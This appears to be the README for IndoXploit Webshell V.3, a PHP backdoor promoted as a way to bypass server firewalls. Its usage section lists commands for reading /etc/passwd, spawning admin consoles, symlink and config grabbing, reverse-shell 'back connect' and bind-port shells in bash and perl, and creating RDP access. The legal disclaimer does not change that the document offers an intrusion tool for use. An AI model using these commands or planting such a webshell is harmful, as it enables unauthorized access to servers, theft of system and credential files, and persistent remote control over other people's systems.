

IndoXploit Webshell V.3

IndoXploit webshell V.3 is an PHP based webshell or backdoor with unique and usefull features. This webshell is originally coded by agussetyar from IndoXploit Coders Team. IndoXploit Shell has been mentioned repeatedly by the coder that it will make you easily bypass server security. With this shell you can comfortably bypass the server firewall from most secure servers. It is one of the hacker's most preferred backdoor shell.

Usage of indoxploit shell for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program



How to Use

 usage: rf [filename]
 example: rf /etc/passwd
usage: spawn [name]



 spawn adminer
 spawn webconsole
 spawn cgitelnet1
usage: jumping
usage: idxconfig
usage: symlink

[Back Connect]

usage: rvr bc [IP] [PORT] [TYPE]


rvr bc 1337 bash
rvr bc 1337 perl

Bind Port

usage: rvr bp [PORT] [TYPE]


rvr bp 1337 perl
usage: krdp
usage: logout
usage: killme


Drop an email at shu@indoxploit.or.id and tell us what your suggestions about how to improve this webshell.



Any actions and or activities related to the material contained within this tool is solely your responsibility.The misuse of the information in this tool can result in criminal charges brought against the persons in question.

Note: modifications, changes, or changes to this code can be accepted, however, every public release that uses this code must be approved by writing this tool (indoxploit team)